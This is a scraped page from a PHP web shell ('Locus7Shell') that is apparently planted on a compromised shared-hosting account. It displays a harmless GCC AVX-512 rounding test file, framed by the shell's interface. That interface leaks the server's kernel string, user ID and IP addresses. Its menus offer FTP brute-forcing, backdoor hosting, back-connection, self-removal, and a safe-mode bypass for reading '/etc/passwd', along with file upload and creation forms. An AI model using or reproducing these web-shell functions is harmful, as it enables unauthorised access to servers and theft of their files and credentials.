Software: Apache. PHP/5.4.45 

uname -a: Linux webm056.cluster010.gra.hosting.ovh.net 5.15.167-ovh-vps-grsec-zfs-classid #1 SMP Tue
Sep 17 08:14:20 UTC 2024 x86_64
 

uid=243112(mycochar) gid=100(users) groups=100(users)  

Safe-mode: OFF (not secure)

/home/mycochar/www/image/photo/gcc-12.3.0/gcc/testsuite/gcc.target/i386/   drwxr-xr-x
Free 0 B of 0 B (0%)
Your ip: 216.73.216.77 - Server ip: 213.186.33.19
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    

[Enumerate]    [Encoder]    [Tools]    [Proc.]    [FTP Brute]    [Sec.]    [SQL]    [PHP-Code]    [Backdoor Host]    [Back-Connection]    [milw0rm it!]    [PHP-Proxy]    [Self remove]
    


Viewing file:     avx512vl-vround-1.c (2.74 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
/* { dg-do compile { target { ! ia32 } } } */
/* { dg-options "-Ofast -mavx512vl" } */

#include <x86intrin.h>

__attribute__((noinline, noclone)) double
f1 (double x)
{
  register double a __asm__ ("xmm16") = __builtin_round (x);
  __asm__ ("" : "+v" (a));
  return a;
}

__attribute__((noinline, noclone)) float
f2 (float x)
{
  register float a __asm__ ("xmm16") = __builtin_roundf (x);
  __asm__ ("" : "+v" (a));
  return a;
}

__attribute__((noinline, noclone)) __m128d
f3 (__m128d x, __m128d y)
{
  register __m128d a __asm__ ("xmm16") = x, b __asm__ ("xmm17") = y;
  __asm__ ("" : "+v" (a), "+v" (b));
  a = _mm_round_sd (a, b, _MM_FROUND_NINT);
  __asm__ ("" : "+v" (a));
  return a;
}

__attribute__((noinline, noclone)) __m128
f4 (__m128 x, __m128 y)
{
  register __m128 a __asm__ ("xmm16") = x, b __asm__ ("xmm17") = y;
  __asm__ ("" : "+v" (a), "+v" (b));
  a = _mm_round_ss (a, b, _MM_FROUND_NINT);
  __asm__ ("" : "+v" (a));
  return a;
}

__attribute__((noinline, noclone)) __m128d
f5 (__m128d x)
{
  register __m128d a __asm__ ("xmm16") = x;
  __asm__ ("" : "+v" (a));
  a = _mm_round_pd (a, _MM_FROUND_NINT);
  __asm__ ("" : "+v" (a));
  return a;
}

__attribute__((noinline, noclone)) __m128
f6 (__m128 x)
{
  register __m128 a __asm__ ("xmm16") = x;
  __asm__ ("" : "+v" (a));
  a = _mm_round_ps (a, _MM_FROUND_NINT);
  __asm__ ("" : "+v" (a));
  return a;
}

__attribute__((noinline, noclone)) __m256d
f7 (__m256d x)
{
  register __m256d a __asm__ ("xmm16") = x;
  __asm__ ("" : "+v" (a));
  a = _mm256_round_pd (a, _MM_FROUND_NINT);
  __asm__ ("" : "+v" (a));
  return a;
}

__attribute__((noinline, noclone)) __m256
f8 (__m256 x)
{
  register __m256 a __asm__ ("xmm16") = x;
  __asm__ ("" : "+v" (a));
  a = _mm256_round_ps (a, _MM_FROUND_NINT);
  __asm__ ("" : "+v" (a));
  return a;
}

/* Instead of vround{sd,ss,pd,ps} this should use vrndscale{sd,ss,pd,ps}
   counterparts, so that [xy]mm1[67] can be referenced directly in the
   instructions.  */
/* { dg-final { scan-assembler-times "vrndscalesd\[^\n\r\]*xmm" 2 } } */
/* { dg-final { scan-assembler-times "vrndscaless\[^\n\r\]*xmm" 2 } } */
/* { dg-final { scan-assembler-times "vrndscalepd\[^\n\r\]*xmm" 1 } } */
/* { dg-final { scan-assembler-times "vrndscaleps\[^\n\r\]*xmm" 1 } } */
/* { dg-final { scan-assembler-times "vrndscalepd\[^\n\r\]*ymm" 1 } } */
/* { dg-final { scan-assembler-times "vrndscaleps\[^\n\r\]*ymm" 1 } } */
/* { dg-final { scan-assembler-not "vroundsd\[^\n\r\]*xmm" } } */
/* { dg-final { scan-assembler-not "vroundss\[^\n\r\]*xmm" } } */
/* { dg-final { scan-assembler-not "vroundpd\[^\n\r\]*xmm" } } */
/* { dg-final { scan-assembler-not "vroundps\[^\n\r\]*xmm" } } */
/* { dg-final { scan-assembler-not "vroundpd\[^\n\r\]*ymm" } } */
/* { dg-final { scan-assembler-not "vroundps\[^\n\r\]*ymm" } } */

Enter:
 
Select:
 

Useful Commands
 
Warning. Kernel may be alerted using higher levels
Kernel Info:

Php Safe-Mode Bypass (Read Files)

File:

eg: /etc/passwd

Php Safe-Mode Bypass (List Directories):

Dir:

eg: /etc/

Search
  - regexp 

Upload
 
[ ok ]

Make Dir
 
[ ok ]
Make File
 
[ ok ]

Go Dir
 
Go File
 

--[ x2300 Locus7Shell v. 1.0a beta Modded by #!physx^ | www.LOCUS7S.com | Generation time: 0.0062 ]--